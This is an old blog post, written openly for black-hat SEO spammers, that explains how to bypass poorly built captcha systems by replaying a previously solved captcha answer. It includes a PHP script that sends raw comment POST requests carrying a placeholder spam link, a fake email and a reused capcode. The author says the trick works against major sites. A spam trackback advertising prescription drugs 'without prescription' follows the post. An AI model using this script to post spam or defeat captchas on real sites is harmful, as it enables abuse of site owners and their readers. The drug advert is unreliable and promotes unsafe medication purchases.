Defeating Captcha’s

Published on July 23rd, 2008

This is my first post on this brand new website focussing on programming tricks.

This one is for all you blackhat seo people out there trying to beat captcha’s with gocr or your own code.

The first thing you have to realise is that beating captcha’s with neaural networks is possible, but it’s very hard.
So if there’s an easier way out, then we’d all be happy to follow that route, right?

Let’s think about how a captcha system works. You create a random string, use GD or ImageMagick to put the string in an image. For the system to know if the entered code corresponds to the right string in the image, it needs to know the answer for every generated captcha.

We can assume that most captcha systems link the filename of the captcha image to the right answer in a database, like so:

Table answers
——————–

Generated image |  Answer
————————-

captcha1.jpg  | DOF93fF

captcha2.jpg  | lf3FM9

Once a person/bot enters the text in the textfield, the system will check if the input corresponds to the right answer. If the input is the same as the answer, you can pass. After that the system SHOULD remove/deactivate the row because the right answer was given to the question.

This is where a lot of systems go wrong. They keep the row in the database, they do not deactivate or remove this row. What are the consequences?

Let’s say I want to post a comment on a blog like this with php:

  1. function comment() {
  2. $fp = fsockopen($domain, 80, $errno, $errstr, 30);
  3. if (!$fp) {
  4. echo "$errstr ($errno)
  5. \n";
  6. } else {
  7. $postdata = "comment_ID=0&comment_level=&comment_post_ID=348&redirect_to=&author=poster&email=fakemail@mail.com&url=&comment=" . urlencode("drop your link here") . "&comment_autobr=1&comment_cookies=1&capcode=ZUTEoo&cid=413&submit=Send+comment";
  8. $salida = "POST /htsrv/comment_post.php HTTP/1.1\r\n";
  9. $salida.="Host: " . $domain . "\r\n";
  10. $salida.="User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n";
  11. $salida.="Content-Type: application/x-www-form-urlencoded\r\n";
  12. $salida.="Content-Length: ".strlen($postdata)."\r\n";
  13. $salida.="Referer: http://" . $domain . $rest . "\r\n";
  14. $salida.="Connection: close\r\n\r\n";
  15. $salida.=$postdata;
  16.  
  17. fwrite($fp, $salida);
  18. while (!feof($fp)) {
  19. $d = fgets($fp);
  20. echo $d;
  21. }
  22. }
  23. fclose($fp);
  24. }

The headers I got by making a most through firefox and capturing them with Live HTTP Headers.
As you can see, the captcha details are included in the post parameters:

capcode=ZUTEoo&cid=413

The cid is most likely the number of the row in the database, this way the system keeps track of which captcha is displayed. The capcode is the correct answer I entered, so this comment will succeed.

Since this is an example of a bad captcha system, it will ofcourse not remove/deactivate the row in the database. Which means I can trick the system into thinking I got the same captcha again (while obviously I got another captcha) and use the same answer I provided earlier. I simply change all the other post parameters but keep using the same captcha parameters:

  1. function comment() {
  2. $fp = fsockopen($domain, 80, $errno, $errstr, 30);
  3. if (!$fp) {
  4. echo "$errstr ($errno)
  5. \n";
  6. } else {
  7. $postdata = "comment_ID=0&comment_level=&comment_post_ID=455&redirect_to=&author=poster&email=fakemail@mail.com&url=&comment=" . urlencode("drop your link here") . "&comment_autobr=1&comment_cookies=1&capcode=ZUTEoo&cid=413&submit=Send+comment";
  8. $salida = "POST /htsrv/comment_post.php HTTP/1.1\r\n";
  9. $salida.="Host: " . $domain . "\r\n";
  10. $salida.="User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3\r\n";
  11. $salida.="Content-Type: application/x-www-form-urlencoded\r\n";
  12. $salida.="Content-Length: ".strlen($postdata)."\r\n";
  13. $salida.="Referer: http://" . $domain . $rest . "\r\n";
  14. $salida.="Connection: close\r\n\r\n";
  15. $salida.=$postdata;
  16.  
  17. fwrite($fp, $salida);
  18. while (!feof($fp)) {
  19. $d = fgets($fp);
  20. echo $d;
  21. }
  22. }
  23. fclose($fp);
  24. }

So I changed the comment_post_ID parameter, which means I posted a comment on another page/blog, but I still kept using the same captcha answer. A lot of systems are vulnerable to this technique, I have been using this very same technique on alexa top 50 websites and they still are vulnerable after all these months.

I hope all of this makes sense. If not, please leave a comment and I’ll do my best to explain.


There Is 1 Response So Far. »

  1. Trackback by CAMERON on Thursday June 24th, 2010:

    Medicamentspot.com International Legal RX Medications. Special Internet Prices (up to 40% off average US price). NO PRIOR PRESCRIPTION REQUIRED!…

    Combivir@buy.online” rel=”nofollow”>.…

Post a Comment